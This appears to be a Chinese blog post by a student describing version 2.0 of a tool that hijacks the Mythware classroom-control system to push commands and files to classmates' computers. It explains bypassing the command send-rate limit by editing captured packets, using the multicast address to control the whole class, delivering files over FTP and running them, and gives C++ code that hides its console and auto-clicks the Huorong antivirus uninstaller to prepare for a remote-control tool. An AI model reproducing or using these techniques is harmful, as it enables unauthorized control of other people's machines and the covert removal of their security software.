反控极域 V2.0

首先奉上源码:源码链接

exe链接(在学校没手机，回去我再上传，毕竟那有一堵墙)

本次更新使得程序更加完善，软件页面如下：

 更新的内容：

1.不限制发送时间间隔！！

2.添加了简介，在如上图X的左侧

3.增加了一些方便的功能，如快捷键隐藏界面，通过文件导入内容，文件上传等功能

大框架基于V1.0版本，这里不补充说明了，说明一些主要功能的实现

1.取消时间间隔

相信大家都能抓包抓到payload

让我们先看这篇文章，链接

文中作者提到了这点  

这一段很有可能就是固定不变的值，起码DMOC这段十六进制是不变的，后期发现，相同数据包在一分钟之内只能发送一次，后面我没有去改代码，应该是dmoc后面随机几个字符，就可以实现了，有大佬有能力可以试试，这些都是猜测，如果说的不对也不要怪我哈

通过不断的尝试（其实就试了5个地方。。），发现这里是可以改变并正常运行的

是的就是这里，我们只需改变这里的十六进制值，便可以不限时间发送命令（别问我为什么，我也不知道。。。）

2.隐藏界面

代码由另一名同学完成（w*x）

可以通过Ctrl+q实现隐藏/显示界面

因为不懂Python所以不知道说些什么好，大部分的软件ui都是由这位同学完成的，感谢~

3.文件传输

使用FTP进行上传文件

先打开FTPserver，选中下载文件，将用户名和密码改掉后启动服务

 然后执行命令中的代码，代码要根据分隔线一块一块打，因为极域有长度限制。。，复制到长命令那执行即可（通过主程序）

先更改第二行的ip为自己电脑ip

然后改文件名

注意：这里我是让对方下载我桌面的文件，所以要把文件先放桌面（或者你也可以改命令）

 如何让对方电脑执行文件？（不会有人不知道吧【doge】）

直接输入命令  "文件绝对路径" 

4.远控

这里远控软件大家自己找。。作者概不负责

但可以教怎么删掉杀软

首先你需要找到电脑中杀软的路径，然后点击uninstall.exe

通过这段C++代码来删杀软（为什么不用Python，1.生成的文件有点大,FTP传的不够快容易败露 2.我不会）

#include <iostream>
#include <thread>
#include <windows.h>
using namespace std;
void mousemove(){for(int i=1;i<=10;++i){Sleep(500);SetCursorPos(680,580);//移动到指定位置mouse_event(MOUSEEVENTF_LEFTDOWN,0,0,0,0);//按下左键mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,0);//松开左键}
}
void openfile(){char s[]=" \"\"C:\\Program Files (x86)\\Huorong\\Sysdiag\\uninst.exe\"\" "; //打开杀软 cout << s;system(s);
}
void hideconsole(){HWND hwnd;hwnd=FindWindow("ConsoleWindowClass",NULL);	//处理顶级窗口的类名和窗口名称匹配指定的字符串,不搜索子窗口。if(hwnd){ShowWindow(hwnd,SW_HIDE);				//设置指定窗口的显示状态}
}
int main()
{hideconsole();thread t1(openfile);thread t2(mousemove);t1.join();t2.join();return 0;
}

鼠标的位置和杀软的路径需要自己弄，弄好后编译运行，将生成的exe和libstdc++-6.dll打包，在通过文件传输送给你的同学就好了

删了杀软后的步骤相信大家都会了【doge】

说明（想到的就写一点）:

1.开始ip列表有的那个ip是组播ip,使用它你将可以控制全班电脑【doge】

2.如何执行任意命令的？ 参考这篇文章

里面有一个MS-DOS方式，去年看到这里才明白的

3.长命令的实现方式？

将换行符/n改为&号即可